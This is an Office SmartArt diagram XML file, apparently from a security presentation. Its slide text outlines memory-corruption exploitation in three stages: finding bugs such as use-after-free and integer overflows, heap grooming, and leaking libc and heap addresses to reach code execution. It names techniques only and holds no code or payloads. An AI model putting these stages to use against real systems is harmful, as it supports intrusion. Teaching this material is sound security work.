    <dgm:cxn modelId="{6794A70E-9687-4E04-A83D-13F6FE1C3C13}" type="presParOf" srcId="{74182234-963B-4AEA-BB43-F97C7C58C10F}" destId="{A4C8257E-F815-46A4-8A00-25C28B2F807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71E764-3E85-4DE3-AF28-041D472AB4A5}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList" loCatId="List" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5E3E326-4479-453A-9863-465A1E47F809}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Discovery</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0F38ABF-175E-4946-97EC-62E269264AEB}" type="parTrans" cxnId="{9E329856-96C5-4B23-88B3-D04215704C20}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{057165DE-592C-4C48-9E8B-4A0E165849AC}" type="sibTrans" cxnId="{9E329856-96C5-4B23-88B3-D04215704C20}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9AA3363-A0CF-4581-838E-44D10A1636B4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Find real vulnerabilities</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0B531D1-B90E-46AA-880A-DED2078B5F53}" type="parTrans" cxnId="{9C70E097-9585-4980-A946-40F716133B61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C71EC89C-9EF3-42B6-84F4-F07AE94CA8CE}" type="sibTrans" cxnId="{9C70E097-9585-4980-A946-40F716133B61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C666466-6D7A-4F8D-B4A6-3C7F702A8979}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Groom</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C81D3CC7-91A3-4C8D-9F81-599C640E7C5D}" type="parTrans" cxnId="{F12530AD-52DF-471F-B225-6CD550F00B41}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0AA0ED09-043D-4354-AC5E-92B5B131BA6E}" type="sibTrans" cxnId="{F12530AD-52DF-471F-B225-6CD550F00B41}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C856F48-A415-4C1B-A482-B3632BF35843}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Heap Feng Shui like a professional </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Allocation/deallocation primitives</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FEC195B-FA72-4C48-AFB8-F0693FBBB455}" type="parTrans" cxnId="{20764379-1613-4C84-AFCF-F99551957736}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6062545-132C-48EA-835F-30887715BBB9}" type="sibTrans" cxnId="{20764379-1613-4C84-AFCF-F99551957736}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Exploit</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{998178D1-54D8-4AB1-8F34-E1A7572A8AF0}" type="parTrans" cxnId="{124AE09D-E03E-4747-8B79-7B7F40A90A1B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6717D412-1282-4A5F-AF6D-B3712D784335}" type="sibTrans" cxnId="{124AE09D-E03E-4747-8B79-7B7F40A90A1B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64B8A8AE-8070-4F13-8777-F7CE6C280C10}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Information leak for </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>libc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> and heap addresses</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9D84081-4F5C-45C2-A456-65C1400400D6}" type="parTrans" cxnId="{321A9274-2D0E-4477-B31B-04D6F71DD384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF006AEC-7400-4CDA-B222-93E74DC0B0C4}" type="sibTrans" cxnId="{321A9274-2D0E-4477-B31B-04D6F71DD384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1B7B574-AE1A-47D3-A5BD-FE7BB0BBFE0D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Use after free for code execution</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15B5DBBE-1DE3-477A-AC3A-C22B09750906}" type="parTrans" cxnId="{9DE93FEA-ACD8-4C33-883F-4396847CEC99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA527D79-1E3E-4823-9B59-0655B7CC4DE5}" type="sibTrans" cxnId="{9DE93FEA-ACD8-4C33-883F-4396847CEC99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13C88EEC-41B9-BE4A-A613-FA0BC57E337F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>UAF</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9D2B92EC-74F6-E04D-873B-D70FEF63FC23}" type="parTrans" cxnId="{A33F2FDE-1C4A-5041-9EFB-78F4380DAA7D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{684317DC-FC82-8C40-B2F7-6C377192AAA2}" type="sibTrans" cxnId="{A33F2FDE-1C4A-5041-9EFB-78F4380DAA7D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06AB39F6-35F6-6648-865A-A772D8130151}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Uninitialized memory </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09357184-651E-0141-A5C3-A20CBFCDF772}" type="parTrans" cxnId="{2B1E7599-678F-BB46-8A3D-59306CAA02B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B79A923A-1321-C84B-A67C-FFB4165B1A78}" type="sibTrans" cxnId="{2B1E7599-678F-BB46-8A3D-59306CAA02B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00B25678-0E60-B942-8BE9-5083A32A621A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Integers overflows</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D08D8C3A-C9AE-AD47-902D-D30E66AEFA3E}" type="parTrans" cxnId="{E39B643B-4058-EC47-845C-5119123F5AF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20102D45-DA48-374B-A1D5-40835EE93D20}" type="sibTrans" cxnId="{E39B643B-4058-EC47-845C-5119123F5AF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0BAF142D-2422-7345-BCFD-1C50023EA20A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Etc. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C78D7CE3-A452-1C4D-A01A-9769B3CD97A6}" type="parTrans" cxnId="{68CCC08C-5D3C-1D44-8CC3-71793F65DF67}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1421C232-9B5A-A047-A0A5-689EA599143B}" type="sibTrans" cxnId="{68CCC08C-5D3C-1D44-8CC3-71793F65DF67}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8A8D52DD-3A81-AE42-9AF4-DBCFD8AD5991}" type="pres">
      <dgm:prSet presAssocID="{B271E764-3E85-4DE3-AF28-041D472AB4A5}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{25D35270-B948-8941-B74D-CD413127A64F}" type="pres">
      <dgm:prSet presAssocID="{B5E3E326-4479-453A-9863-465A1E47F809}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{643A7FF0-9837-9C4D-A601-2AD36DC83AF9}" type="pres">
      <dgm:prSet presAssocID="{B5E3E326-4479-453A-9863-465A1E47F809}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}" type="pres">
      <dgm:prSet presAssocID="{B5E3E326-4479-453A-9863-465A1E47F809}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2803B661-C2D7-7E41-B727-D337D430C750}" type="pres">
      <dgm:prSet presAssocID="{057165DE-592C-4C48-9E8B-4A0E165849AC}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8147F24F-AAC5-9441-849B-F2625D4BEF6E}" type="pres">
      <dgm:prSet presAssocID="{8C666466-6D7A-4F8D-B4A6-3C7F702A8979}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EB327EF0-AC35-D544-9E8E-21DBBF6AC732}" type="pres">
      <dgm:prSet presAssocID="{8C666466-6D7A-4F8D-B4A6-3C7F702A8979}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FFE7C057-3DD9-FD4E-BB5E-66BCDDBBE4CE}" type="pres">
      <dgm:prSet presAssocID="{8C666466-6D7A-4F8D-B4A6-3C7F702A8979}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FA60B5ED-6FC1-EA4C-A5CB-9A4EE5B07D25}" type="pres">
      <dgm:prSet presAssocID="{0AA0ED09-043D-4354-AC5E-92B5B131BA6E}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0F44AB7-2D2F-0545-82CA-CBE0F460A335}" type="pres">
      <dgm:prSet presAssocID="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3308D2C7-7031-E147-B08E-4A839BD7E511}" type="pres">
      <dgm:prSet presAssocID="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{173132A0-8F0E-5A46-9688-8CF324862B5C}" type="pres">
      <dgm:prSet presAssocID="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{119AC50B-363D-AE4E-AE31-4B54F34029C9}" type="presOf" srcId="{00B25678-0E60-B942-8BE9-5083A32A621A}" destId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{4AA0E70F-1A81-3E4F-B556-5AA1C2A8610C}" type="presOf" srcId="{B5E3E326-4479-453A-9863-465A1E47F809}" destId="{643A7FF0-9837-9C4D-A601-2AD36DC83AF9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{BC961815-2F9F-4347-8E1C-ABC813178999}" type="presOf" srcId="{A9AA3363-A0CF-4581-838E-44D10A1636B4}" destId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{A6E18629-2D3C-0B47-9924-79C64E70912C}" type="presOf" srcId="{13C88EEC-41B9-BE4A-A613-FA0BC57E337F}" destId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{E39B643B-4058-EC47-845C-5119123F5AF9}" srcId="{A9AA3363-A0CF-4581-838E-44D10A1636B4}" destId="{00B25678-0E60-B942-8BE9-5083A32A621A}" srcOrd="2" destOrd="0" parTransId="{D08D8C3A-C9AE-AD47-902D-D30E66AEFA3E}" sibTransId="{20102D45-DA48-374B-A1D5-40835EE93D20}"/>
    <dgm:cxn modelId="{9E329856-96C5-4B23-88B3-D04215704C20}" srcId="{B271E764-3E85-4DE3-AF28-041D472AB4A5}" destId="{B5E3E326-4479-453A-9863-465A1E47F809}" srcOrd="0" destOrd="0" parTransId="{E0F38ABF-175E-4946-97EC-62E269264AEB}" sibTransId="{057165DE-592C-4C48-9E8B-4A0E165849AC}"/>
    <dgm:cxn modelId="{120A8E6B-0B4C-334E-AF2C-32AA9B88BC21}" type="presOf" srcId="{64B8A8AE-8070-4F13-8777-F7CE6C280C10}" destId="{173132A0-8F0E-5A46-9688-8CF324862B5C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{35C39671-0F2A-9547-8124-C6FDF559E9A4}" type="presOf" srcId="{5C856F48-A415-4C1B-A482-B3632BF35843}" destId="{FFE7C057-3DD9-FD4E-BB5E-66BCDDBBE4CE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{321A9274-2D0E-4477-B31B-04D6F71DD384}" srcId="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}" destId="{64B8A8AE-8070-4F13-8777-F7CE6C280C10}" srcOrd="0" destOrd="0" parTransId="{A9D84081-4F5C-45C2-A456-65C1400400D6}" sibTransId="{DF006AEC-7400-4CDA-B222-93E74DC0B0C4}"/>
    <dgm:cxn modelId="{20764379-1613-4C84-AFCF-F99551957736}" srcId="{8C666466-6D7A-4F8D-B4A6-3C7F702A8979}" destId="{5C856F48-A415-4C1B-A482-B3632BF35843}" srcOrd="0" destOrd="0" parTransId="{3FEC195B-FA72-4C48-AFB8-F0693FBBB455}" sibTransId="{A6062545-132C-48EA-835F-30887715BBB9}"/>
    <dgm:cxn modelId="{028BB682-7672-5949-80F9-4A16C22AC1AD}" type="presOf" srcId="{06AB39F6-35F6-6648-865A-A772D8130151}" destId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{70AB7686-7409-1B4E-84E9-27DBE8F41AE7}" type="presOf" srcId="{0BAF142D-2422-7345-BCFD-1C50023EA20A}" destId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{68CCC08C-5D3C-1D44-8CC3-71793F65DF67}" srcId="{A9AA3363-A0CF-4581-838E-44D10A1636B4}" destId="{0BAF142D-2422-7345-BCFD-1C50023EA20A}" srcOrd="3" destOrd="0" parTransId="{C78D7CE3-A452-1C4D-A01A-9769B3CD97A6}" sibTransId="{1421C232-9B5A-A047-A0A5-689EA599143B}"/>
    <dgm:cxn modelId="{A1615893-F2C3-164C-870E-0A7648B490CE}" type="presOf" srcId="{B271E764-3E85-4DE3-AF28-041D472AB4A5}" destId="{8A8D52DD-3A81-AE42-9AF4-DBCFD8AD5991}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{9C70E097-9585-4980-A946-40F716133B61}" srcId="{B5E3E326-4479-453A-9863-465A1E47F809}" destId="{A9AA3363-A0CF-4581-838E-44D10A1636B4}" srcOrd="0" destOrd="0" parTransId="{E0B531D1-B90E-46AA-880A-DED2078B5F53}" sibTransId="{C71EC89C-9EF3-42B6-84F4-F07AE94CA8CE}"/>
    <dgm:cxn modelId="{140DC798-F31E-A741-B44B-3BBA46D089CA}" type="presOf" srcId="{8C666466-6D7A-4F8D-B4A6-3C7F702A8979}" destId="{EB327EF0-AC35-D544-9E8E-21DBBF6AC732}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{2B1E7599-678F-BB46-8A3D-59306CAA02B2}" srcId="{A9AA3363-A0CF-4581-838E-44D10A1636B4}" destId="{06AB39F6-35F6-6648-865A-A772D8130151}" srcOrd="1" destOrd="0" parTransId="{09357184-651E-0141-A5C3-A20CBFCDF772}" sibTransId="{B79A923A-1321-C84B-A67C-FFB4165B1A78}"/>
    <dgm:cxn modelId="{124AE09D-E03E-4747-8B79-7B7F40A90A1B}" srcId="{B271E764-3E85-4DE3-AF28-041D472AB4A5}" destId="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}" srcOrd="2" destOrd="0" parTransId="{998178D1-54D8-4AB1-8F34-E1A7572A8AF0}" sibTransId="{6717D412-1282-4A5F-AF6D-B3712D784335}"/>
    <dgm:cxn modelId="{34E201A1-0C3D-B349-B4E1-8ADE68F2A912}" type="presOf" srcId="{D1B7B574-AE1A-47D3-A5BD-FE7BB0BBFE0D}" destId="{173132A0-8F0E-5A46-9688-8CF324862B5C}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{F12530AD-52DF-471F-B225-6CD550F00B41}" srcId="{B271E764-3E85-4DE3-AF28-041D472AB4A5}" destId="{8C666466-6D7A-4F8D-B4A6-3C7F702A8979}" srcOrd="1" destOrd="0" parTransId="{C81D3CC7-91A3-4C8D-9F81-599C640E7C5D}" sibTransId="{0AA0ED09-043D-4354-AC5E-92B5B131BA6E}"/>
    <dgm:cxn modelId="{2325F5C7-7483-564C-862F-D2B0D449F6B2}" type="presOf" srcId="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}" destId="{3308D2C7-7031-E147-B08E-4A839BD7E511}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{A33F2FDE-1C4A-5041-9EFB-78F4380DAA7D}" srcId="{A9AA3363-A0CF-4581-838E-44D10A1636B4}" destId="{13C88EEC-41B9-BE4A-A613-FA0BC57E337F}" srcOrd="0" destOrd="0" parTransId="{9D2B92EC-74F6-E04D-873B-D70FEF63FC23}" sibTransId="{684317DC-FC82-8C40-B2F7-6C377192AAA2}"/>
    <dgm:cxn modelId="{9DE93FEA-ACD8-4C33-883F-4396847CEC99}" srcId="{AC8C4672-7C5C-4978-B4FA-88B38838AECC}" destId="{D1B7B574-AE1A-47D3-A5BD-FE7BB0BBFE0D}" srcOrd="1" destOrd="0" parTransId="{15B5DBBE-1DE3-477A-AC3A-C22B09750906}" sibTransId="{AA527D79-1E3E-4823-9B59-0655B7CC4DE5}"/>
    <dgm:cxn modelId="{B7501302-746A-664F-B438-BF24350AA037}" type="presParOf" srcId="{8A8D52DD-3A81-AE42-9AF4-DBCFD8AD5991}" destId="{25D35270-B948-8941-B74D-CD413127A64F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{3B0CDE0C-C477-D646-A9FE-EE267709CECF}" type="presParOf" srcId="{25D35270-B948-8941-B74D-CD413127A64F}" destId="{643A7FF0-9837-9C4D-A601-2AD36DC83AF9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{9AF64B60-D3AB-944F-85AE-1950E8E4916C}" type="presParOf" srcId="{25D35270-B948-8941-B74D-CD413127A64F}" destId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{7EEEE2FE-FF4C-B941-B4EB-998B8AC62832}" type="presParOf" srcId="{8A8D52DD-3A81-AE42-9AF4-DBCFD8AD5991}" destId="{2803B661-C2D7-7E41-B727-D337D430C750}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{5D68C300-7666-F34A-BDF9-1F72416C29BE}" type="presParOf" srcId="{8A8D52DD-3A81-AE42-9AF4-DBCFD8AD5991}" destId="{8147F24F-AAC5-9441-849B-F2625D4BEF6E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{DC731A8C-B156-0441-AD03-5B8541D7B466}" type="presParOf" srcId="{8147F24F-AAC5-9441-849B-F2625D4BEF6E}" destId="{EB327EF0-AC35-D544-9E8E-21DBBF6AC732}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{010B8C1C-1A8F-1D48-8A79-1276D5A092AD}" type="presParOf" srcId="{8147F24F-AAC5-9441-849B-F2625D4BEF6E}" destId="{FFE7C057-3DD9-FD4E-BB5E-66BCDDBBE4CE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{01AE6FD8-3E4C-624C-906B-D239F73EFF93}" type="presParOf" srcId="{8A8D52DD-3A81-AE42-9AF4-DBCFD8AD5991}" destId="{FA60B5ED-6FC1-EA4C-A5CB-9A4EE5B07D25}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{8EBE0268-2925-F947-ABC9-038C11605591}" type="presParOf" srcId="{8A8D52DD-3A81-AE42-9AF4-DBCFD8AD5991}" destId="{F0F44AB7-2D2F-0545-82CA-CBE0F460A335}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
    <dgm:cxn modelId="{31F38D46-84C8-7545-A307-E7C68CBAF8ED}" type="presParOf" srcId="{F0F44AB7-2D2F-0545-82CA-CBE0F460A335}" destId="{3308D2C7-7031-E147-B08E-4A839BD7E511}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/HorizontalActionList"/>
